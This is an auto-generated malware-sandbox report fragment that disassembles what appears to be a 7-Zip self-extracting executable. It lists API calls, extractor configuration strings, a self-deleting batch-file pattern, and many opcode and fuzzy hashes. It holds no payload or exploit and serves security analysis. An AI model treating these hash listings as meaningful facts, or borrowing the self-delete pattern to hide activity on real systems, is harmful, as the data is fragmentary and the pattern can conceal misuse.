                                                                            • Instruction ID: d276be45ba9710969d4d69a2fbd68599cb80de3b2bdcae4a446b37c04d3c8c9c
                                                                            • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                            • Instruction Fuzzy Hash: 6A41C360C14B9652EB134F7CC842272B320BFAB244F00D75AFDD179922FB3266446255
                                                                            Function 00413370 Relevance: .1, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                            • Instruction ID: 6fc8e050a97d926f750d5da14c4a761a5f22703977f0277d1b92a118b0bcd8c9
                                                                            • Opcode Fuzzy Hash: e9ef0b0ca1b2f4f90659186b02398175d102153a1dce1c25c5b035dc35f82aa6
                                                                            • Instruction Fuzzy Hash: 2F212E7B370D4607EB0C8939AE336BE2582E340346F88953DD247C5784EE9E9954810D
                                                                            Function 004139D1 Relevance: .1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                            • Instruction ID: 593f74aba8cbd25357504dd2d18fce0fb38989f15731237b119c96727be92a00
                                                                            • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                            • Instruction Fuzzy Hash: 7521C53291462547CB02CE6EE4845A7F392FFC436BF174767ED8467290C629A85486E0
                                                                            Function 00413AAB Relevance: .1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                            • Instruction ID: f31e75e8446499c6638a38678b48eff386f2da62f80cbfd2527233499c21bf4b
                                                                            • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                            • Instruction Fuzzy Hash: 21213B7291842587C701DF1DE4886B7B3E1FFC431AF678A3BD9828B182C638E885D794
                                                                            Function 0040503E Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 213threadprocesssynchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCommandLineW.KERNEL32(?,?,?), ref: 0040505F
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00405122
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 0040512A
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00405132
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 0040513A
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 00405142
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000), ref: 0040514A
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000), ref: 00405152
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040515A
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00405162
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
                                                                            • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
                                                                            • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
                                                                            • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
                                                                            • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
                                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
                                                                            • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
                                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                            • String ID: " -$sfxwaitall
                                                                            • API String ID: 2734624574-3991362806
                                                                            • Opcode ID: 643fa3cc5beeae6f8d39527fc6abcbdd7a7791ff37a5eeb50854b5f684dbaa86
                                                                            • Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
                                                                            • Opcode Fuzzy Hash: 643fa3cc5beeae6f8d39527fc6abcbdd7a7791ff37a5eeb50854b5f684dbaa86
                                                                            • Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68
                                                                            Function 00405304 Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
                                                                            • WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
                                                                            • CloseHandle.KERNEL32(00419858), ref: 00405445
                                                                            • SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
                                                                            • ??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
                                                                            • ??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                            • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                            • API String ID: 3007203151-3467708659
                                                                            • Opcode ID: 13b319529610c754c5bab4c01b5e1152ea1f27b0a7c92a127f226609597e94be
                                                                            • Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
                                                                            • Opcode Fuzzy Hash: 13b319529610c754c5bab4c01b5e1152ea1f27b0a7c92a127f226609597e94be
                                                                            • Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68
                                                                            Function 0040312D Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00403140
                                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00403160
                                                                              • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                              • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
                                                                            • GetParent.USER32(?), ref: 0040319B
                                                                            • LoadLibraryA.KERNEL32(riched20), ref: 004031AF
                                                                            • GetMenu.USER32(?), ref: 004031C2
                                                                            • SetThreadLocale.KERNEL32(00000419), ref: 004031CF
                                                                            • CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
                                                                            • DestroyWindow.USER32(?), ref: 00403210
                                                                            • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
                                                                            • GetSysColor.USER32(0000000F), ref: 00403229
                                                                            • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
                                                                            • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
                                                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                            • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                            • API String ID: 3514532227-2281146334
                                                                            • Opcode ID: 6f4647c99caaab53e68a714a11fc1007a8fa1957a86f658c4333d53be50d8091
                                                                            • Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
                                                                            • Opcode Fuzzy Hash: 6f4647c99caaab53e68a714a11fc1007a8fa1957a86f658c4333d53be50d8091
                                                                            • Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68
                                                                            Function 004086EB Relevance: 34.8, APIs: 23, Instructions: 265windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                            • LoadIconW.USER32(00000000), ref: 00408717
                                                                            • GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                            • GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                            • LoadImageW.USER32(00000000), ref: 0040873C
                                                                            • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                            • GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                            • GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                            • GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                            • GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                            • GetWindow.USER32(?,00000005), ref: 004088C3
                                                                            • GetWindow.USER32(?,00000005), ref: 004088DF
                                                                            • GetWindow.USER32(?,00000005), ref: 004088F7
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
                                                                            • LoadIconW.USER32(00000000), ref: 0040895E
                                                                            • GetDlgItem.USER32(?,000004B1), ref: 0040897D
                                                                            • SendMessageW.USER32(00000000), ref: 00408980
                                                                              • Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
                                                                              • Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E
                                                                              • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                              • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                            • String ID:
                                                                            • API String ID: 3694754696-0
                                                                            • Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                            • Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
                                                                            • Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                            • Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E
                                                                            Function 00404B06 Relevance: 33.5, APIs: 3, Strings: 16, Instructions: 207stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                              • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                              • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                              • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                              • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                              • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                              • Part of subcall function 00402187: lstrcmpiW.KERNEL32(00618E68,00404926), ref: 0040224B
                                                                              • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00618E68), ref: 0040225B
                                                                              • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                              • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                              • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                              • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                            • _wtol.MSVCRT ref: 00404CDF
                                                                            • _wtol.MSVCRT ref: 00404CFB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                            • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
                                                                            • API String ID: 2725485552-1675048025
                                                                            • Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                            • Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
                                                                            • Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                            • Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D
                                                                            Function 00401EB2 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                            • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                            • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                            • CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                            • CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                            • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                            • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                            • GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                            • SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                            • DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                            • DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00401FC5
                                                                            • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
                                                                            • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                            • String ID:
                                                                            • API String ID: 3462224810-0
                                                                            • Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                            • Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
                                                                            • Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                            • Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4
                                                                            Function 00401FDD Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
                                                                            • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00402019
                                                                            • GetMenu.USER32(?), ref: 0040202E
                                                                              • Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                              • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                              • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                              • Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                              • Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                              • Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
                                                                            • memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
                                                                            • CoInitialize.OLE32(00000000), ref: 00402076
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 004020B7
                                                                              • Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                              • Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                              • Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                              • Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                              • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                              • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                              • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                              • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                              • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                              • Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                              • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                              • Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                              • Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                              • Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                              • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                              • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                              • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                              • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                              • Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
                                                                            • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
                                                                            • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402124
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.3280193610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.3280152778.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280239624.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280270036.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.3280314138.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                                            Similarity
